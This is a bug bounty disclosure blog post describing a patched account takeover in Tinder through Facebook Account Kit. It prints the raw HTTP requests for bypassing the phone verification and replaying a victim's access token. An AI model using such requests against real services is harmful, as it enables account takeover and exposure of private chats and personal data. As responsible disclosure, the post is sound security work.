Navigate back to the homepage

How we hacked Tinder accounts using Facebook’s Account Kit and earned $6,250 in bounties

Anand Prakash
February 20th, 2018 · 2 min read

This is being published with the permission of Facebook under the responsible disclosure policy.

The vulnerabilities mentioned in this blog post were plugged quickly by the engineering teams of Facebook and Tinder.

This post is about an account takeover vulnerability we discovered in Tinder’s application. By exploiting this, an attacker could have gained access to the victim’s Tinder account, who must have used their phone number to log in.

This could have been exploited through a vulnerability in Facebook’s Account Kit, which Facebook has recently addressed.

Both Tinder’s web and mobile applications allow users to use their mobile phone numbers to log into the service. And this login service is provided by Account Kit (Facebook).

alt text for medium image

Login Service Powered by Facebook’s Accountkit on Tinder

The user clicks on Login with Phone Number on tinder.com and then they are redirected to Accountkit.com for login. If the authentication is successful then Account Kit passes the access token to Tinder for login.

Interestingly, the Tinder API was not checking the client ID on the token provided by Account Kit.

This enabled the attacker to use any other app’s access token provided by Account Kit to take over the real Tinder accounts of other users.

Vulnerability Description

Account Kit is a product of Facebook that lets people quickly register for and log in to some registered apps by using just their phone numbers or email addresses without needing a password. It is reliable, easy to use, and gives the user a choice about how they want to sign up for apps.

Tinder is a location-based mobile app for searching and meeting new people. It allows users to like or dislike other users, and then proceed to a chat if both parties swiped right.

There was a vulnerability in Account Kit through which an attacker could have gained access to any user’s Account Kit account just by using their phone number. Once in, the attacker could have gotten ahold of the user’s Account Kit access token present in their cookies (aks).

After that, the attacker could use the access token (aks) to log into the user’s Tinder account using a vulnerable API.

How my exploit worked step-by-step

Step #1

First the attacker would log into victim’s Account Kit account by entering the victim’s phone number in “new_phone_number” in the API request shown below.

Please note that Account Kit was not verifying the mapping of the phone numbers with their one-time password. The attacker could enter anyone’s phone number and then simply log into the victim’s Account Kit account.

Then the attacker could copy the victim’s “aks” access token of Account Kit app from cookies.

The vulnerable Account Kit API:

1_POST /update/async/phone/confirm/?dpr=2 HTTP/1.1_
2
3_Host: [www.accountkit.com](http://www.accountkit.com)_
4
5_new_phone_number=[vctim’s phone number]
6&update_request_code=c1fb2e919bb33a076a7c6fe4a9fbfa97[attacker’s request code]
7&confirmation_code=258822[attacker’s code]
8&**user=0&**a=1&**dyn=&**req=6&**be=-1&**pc=PHASED%3ADEFAULT&\_\_rev=3496767&fb_dtsg=&jazoest=_
alt text for medium image

Step #2

Now the attacker simply replays the following request using the copied access token “aks” of victim into the Tinder API below.

They will be logged into the victim’s Tinder account. The attacker would then basically have full control over the victim’s account. They could read private chats, full personal information, and swipe other user’s profiles left or right, among other things.

Vulnerable Tinder API:

1_POST /v2/auth/login/accountkit?locale=en HTTP/1.1
2Host: **api.gotinder.com**
3Connection: close
4Content-Length: 185
5Origin: [https://tinder.com](https://tinder.com)
6app-version: 1000000
7platform: web
8User-Agent: Mozilla/5.0 (Macintosh)
9content-type: application/json
10Accept: _/_
11Referer: [https://tinder.com/](https://tinder.com/)
12Accept-Encoding: gzip, deflate
13Accept-Language: en-US,en;q=0.9
14{“token”:”xxx”,”id”:””}_

Video Proof of Concept

Timeline

Both the vulnerabilities were fixed by Tinder and Facebook quickly. Facebook rewarded us with $5,000, and Tinder awarded us with $1,250.

You can contact us at [email protected] or [email protected].

More articles from AppSecure

We figured out a way to hack any of Facebook’s 2 billion accounts, and they paid us a $15,000 bounty for it

This post is about a simple vulnerability we discovered on Facebook which we could have used to hack into other users’ Facebook accounts easily and without any user interaction.

February 9th, 2018 · 1 min read

Here’s how we could’ve ridden for free with Uber

This post is about a critical bug on Uber which could have been used by hackers to get unlimited free Uber rides anywhere in the world. This post also explains few best practices while integrating payment gateways.

January 26th, 2018 · 1 min read
© 2019 AppSecure
Link to $https://twitter.com/appsecureLink to $https://github.com/AppSecureIndiaLink to $https://www.linkedin.com/company/appsecure-india/